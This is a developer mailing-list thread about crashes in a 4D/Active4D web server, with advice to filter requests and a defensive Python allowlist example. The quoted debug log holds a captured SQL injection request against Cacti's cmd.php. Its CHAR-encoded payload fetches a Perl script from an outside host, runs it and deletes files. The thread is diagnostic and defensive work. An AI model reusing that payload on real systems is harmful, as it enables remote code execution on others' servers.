Stuart,
> Has anyone else experienced this?
Yes, I have seen similar behavior in the past. I also recall that
Aparajita fixed some crashing problems due to these types of exploits,
but don't recall the version. Going to 4.0 might fix the problem.
Here is the bug tracker ticket:
http://tracker.aparajitaworld.com/tracker/view.php?id=675
> Can I use the A4D_PreOnWebConnectionHook to filter these types of URLs
> out?
Certainly give it a try. If you can create a "whitelist" of valid
requests, let those pass through, otherwise kick everything else back
with an error. Using A4D regular expressions can help with that...
What I like to do is put a web server in front of Active4D (WebSTAR or
Apache) and use their respective rewrite modules to filter legitimate
requests. That way the kind of stuff you've shown below never reaches
Active4D or 4D's web server.
-- Brad Perkins
Stuart Holroyd wrote:
We have been having what appears to be random crashes of our 4D / A4D
application. After finally getting the 4D Debug Log turned on and set
to 'detail', we have this at the end of the log.
Our application runs in this environment:
Server: IBM PC
4D: 2004.6 Volume Runtime
Web Server: 4D Web Server
Active 4D: 3.0.1b7 (we are switching to A4D 4.0 with the next major
release, due any day)
Has anyone else experienced this?
Can I use the A4D_PreOnWebConnectionHook to filter these types of URLs
out?
3012781 [6] cmd: SET COLOR (A4D_SORTSESSIONSTATS).
3012781 [6] cmd: SORT ARRAY (A4D_SORTSESSIONSTATS).
3012781 [6] cmd: Dec (A4D_UPDATESESSIONSTATS).
3012781 [6] cmd: Trunc (A4D_UPDATESESSIONSTATS).
3012781 [6] cmd: String (A4D_UPDATESESSIONSTATS).
3012781 [6] cmd: String (A4D_UPDATESESSIONSTATS).
3012781 [6] cmd: Char (A4D_UPDATESESSIONSTATS).
3012781 [6] cmd: String (A4D_UPDATESESSIONSTATS).
3012781 [6] cmd: String (A4D_UPDATESESSIONSTATS).
3012843 [7] webUrl: /cacti/cmd.php?1
1111)/**/UNION/**/SELECT/**/2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR(32,114,109,32,45,114,102,32,47,116,109,112,47,100,101,115,107,46,112,108,59,119,103,101,116,32,119,119,119,46,115,104,97,100,121,46,49,115,116,104,111,115,116,46,111,114,103,47,100,101,115,107,46,112,108,32,45,79,32,47,116,109,112,47,100,101,115,107,46,112,108,59,112,101,114,108,32,47,116,109,112,47,100,101,115,107,46,112,108,59,114,109,32,45,114,102,32,47,116,109,112,47,111,117,116,32,62,32,46,47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null/**/FROM/**/host/*
11111
3012843 [7] onWebAuthentificationCall: /cacti/cmd.php?1
1111)/**/UNION/**/SELECT/**/2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR(32,114,109,32,45,114,102,32,47,116,109,112,47,100,101,115,107,46,112,108,59,119,103,101,116,32,119,119,119,46,115,104,97,100,121,46,49,115,116,104,111,115,116,46,111,114,103,47,100,101,115,107,46,112,108,32,45,79,32,47,116,109,112,47,100,101,115,107,46,112,108,59,112,101,114,108,32,47,116,109,112,47,100,101,115,107,46,112,108,59,114,109,32,45,114,102,32,47,116,109,112,47,111,117,116,32,62,32,46,47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null/**/FROM/**/host/*
11111
3012843 [7] end_onWebAuthentificationCall
3012843 [7] onWebConnectionCall: /cacti/cmd.php?1
1111)/**/UNION/**/SELECT/**/2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR(32,114,109,32,45,114,102,32,47,116,109,112,47,100,101,115,107,46,112,108,59,119,103,101,116,32,119,119,119,46,115,104,97,100,121,46,49,115,116,104,111,115,116,46,111,114,103,47,100,101,115,107,46,112,108,32,45,79,32,47,116,109,112,47,100,101,115,107,46,112,108,59,112,101,114,108,32,47,116,109,112,47,100,101,115,107,46,112,108,59,114,109,32,45,114,102,32,47,116,109,112,47,111,117,116,32,62,32,46,47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null/**/FROM/**/host/*
11111
3012843 [7] cmd: MESSAGES OFF (* ON WEB CONNECTION).
3012843 [7] cmd: READ ONLY (* ON WEB CONNECTION).
3012843 [7] cmd: ON ERR CALL (* ON WEB CONNECTION).
3012843 [7] cmd: SET BLOB SIZE (* ON WEB CONNECTION).
3012843 [7] cmd: ARRAY TEXT (* ON WEB CONNECTION).
3012843 [7] cmd: ARRAY TEXT (* ON WEB CONNECTION).
3012843 [7] cmd: ARRAY TEXT (* ON WEB CONNECTION).
3012843 [7] cmd: Secured Web connection (* ON WEB CONNECTION).
3012843 [7] cmd: ARRAY TEXT (* ON WEB CONNECTION).
3012843 [7] cmd: ARRAY TEXT (* ON WEB CONNECTION).
3012843 [7] cmd: GET WEB FORM VARIABLES (* ON WEB CONNECTION).
3012843 [7] plugInName: Active4D 3.0; cmd: A4D Execute 4D request
3012843 [7] plugInName: Active4D 3.0; externCall: -91.
---------------------------------------------------
Stuart Holroyd AKTIV Software Corporation
[EMAIL PROTECTED] http://www.aktiv.com
Tel: 250.658.6300
Fax: 250.658.6201
_______________________________________________
Active4D-dev mailing list
[email protected]
http://mailman.aparajitaworld.com/mailman/listinfo/active4d-dev
Archives: http://mailman.aparajitaworld.com/archive/active4d-dev/
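The allowlist approach suggested in the reply above, as an added example that is not part of the original thread and not Active4D or Apache code: it is a Python stand-in for the decision logic one would put in the pre-connection hook or in front-end rewrite rules. The allowlist entries, `MAX_URL_LENGTH`, and the function names are hypothetical, and the sample log is constructed in the `webUrl:` format shown in the post.

```python
import re

# Hypothetical allowlist for illustration: path pattern -> {parameter: value pattern}.
# Substitute the application's real pages; anything not listed is refused.
ALLOWLIST = [
    (re.compile(r"/(index\.a4d)?"), {}),
    (re.compile(r"/orders/view\.a4d"), {"id": re.compile(r"[0-9]{1,10}")}),
    (re.compile(r"/static/[A-Za-z0-9_-]+\.(css|js|png|gif)"), {}),
]
MAX_URL_LENGTH = 512  # assumed ceiling; legitimate URLs in this sketch are short

def is_allowed(url):
    """Return True only if the URL matches an allowlist entry exactly."""
    if len(url) > MAX_URL_LENGTH or re.search(r"[^\x21-\x7e]", url):
        return False  # over-long, or contains whitespace/control/non-ASCII
    path, _, query = url.partition("?")
    params = {}
    for field in query.split("&") if query else []:
        name, sep, value = field.partition("=")
        if not sep or name in params:
            return False  # bare token or repeated parameter
        params[name] = value
    for path_re, spec in ALLOWLIST:
        if path_re.fullmatch(path):
            # Every parameter must be known and its raw value well-formed.
            return all(n in spec and spec[n].fullmatch(v) is not None
                       for n, v in params.items())
    return False  # unknown path: refused without needing to recognise the attack

# Matches the "<tick> [<process>] webUrl: <url>" lines of a 4D debug log.
WEB_URL = re.compile(r"^\d+ \[\d+\] webUrl: (.*)$", re.MULTILINE)

def refused_urls(debug_log):
    """List the logged request URLs that the allowlist would have turned away."""
    return [u for u in WEB_URL.findall(debug_log) if not is_allowed(u)]

# Constructed sample log (abbreviated requests, not the lines from the post).
SAMPLE_LOG = """\
100 [7] webUrl: /index.a4d
101 [7] webUrl: /orders/view.a4d?id=4711
102 [8] webUrl: /orders/view.a4d?id=4711/**/UNION/**/SELECT/**/1
103 [8] webUrl: /cacti/cmd.php?1 1111)/**/UNION/**/SELECT/**/2,0,1/**/FROM/**/host/*
104 [9] cmd: String (A4D_UPDATESESSIONSTATS).
"""

if __name__ == "__main__":
    for url in refused_urls(SAMPLE_LOG):
        print("refused:", url)
```

The request for `/cacti/cmd.php` is refused because the path is not on the list, so the filter does not depend on recognising SQL keywords in the query string.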